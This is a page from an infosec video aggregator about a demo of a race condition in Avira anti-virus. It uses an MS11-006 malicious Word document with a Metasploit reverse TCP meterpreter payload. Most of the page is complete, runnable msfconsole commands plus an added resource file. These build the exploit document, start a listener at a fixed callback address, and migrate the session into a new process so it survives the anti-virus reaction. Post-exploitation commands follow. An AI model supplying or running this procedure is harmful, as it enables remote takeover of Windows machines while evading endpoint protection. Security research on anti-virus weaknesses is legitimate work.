Description: This video demonstrates a race condition against Avira anti-virus products. The race condition is caused by design errors in the Avira anti-virus products themselves.
We exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) with a reverse TCP meterpreter payload.
As you will see, the installed "Avira AntiVir Personal" anti-virus detects the attack, but too late: by then the meterpreter session has already been established and you have access to the system.
The demonstrated product is an up-to-date Avira AntiVir Personal, but the same race condition appears in other Avira products, such as Avira AntiVir Premium and Avira Premium Security Suite.
Metasploit commands:
To create the msf.doc file that exploits the MS11-006 vulnerability (the module writes it to ~/.msf4/local/ by default):
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
To listen for incoming meterpreter sessions (start this before the document is opened on the target; InitialAutoRunScript migrate -f spawns a new process and migrates the session into it as soon as it connects, so the session survives if the anti-virus later kills the exploited process):
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
Once a session opens, interact with it (sessions -i <id>, where <id> is the number shown by sessions -l) and verify the result; getpid and ps show that meterpreter is no longer running in the process that opened the document:
sysinfo
ipconfig
getpid
ps
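The same procedure as a single msfconsole resource file, added here as an example and not part of the original video or post. It puts the handler first so it is already listening when the document is opened. LHOST 192.168.178.21 is the address from the description; the file name avira_race.rc and LPORT 4444 (the handler default) are assumptions.

```text
# avira_race.rc - added example, not from the original video.
# Run with: msfconsole -r avira_race.rc   (file name is an assumption)

# 1. Start the handler as a background job before the target opens the
#    document. ExitOnSession false keeps it listening for further callbacks.
#    InitialAutoRunScript migrate -f spawns a fresh process and moves
#    meterpreter into it on connect, so the session survives if the
#    anti-virus later kills the exploited process.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set LPORT 4444
set ExitOnSession false
set InitialAutoRunScript migrate -f
exploit -j -z

# 2. Build the malicious document with the matching payload settings.
#    It is written to ~/.msf4/local/msf.doc by default.
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set LPORT 4444
set FILENAME msf.doc
exploit
```

After msf.doc has been opened on the target and the handler reports a session, interact with it manually (sessions -l, then sessions -i <id>) and run getpid and ps: the PID returned by getpid should belong to the freshly spawned process, not to the application that opened the document, which is what lets the session outlive the anti-virus reaction.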
Tags: metasploit, avira, anti-virus, antivirus, hack, windows, microsoft
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Very nice! Goes on to show that security products themselves are not foolproof.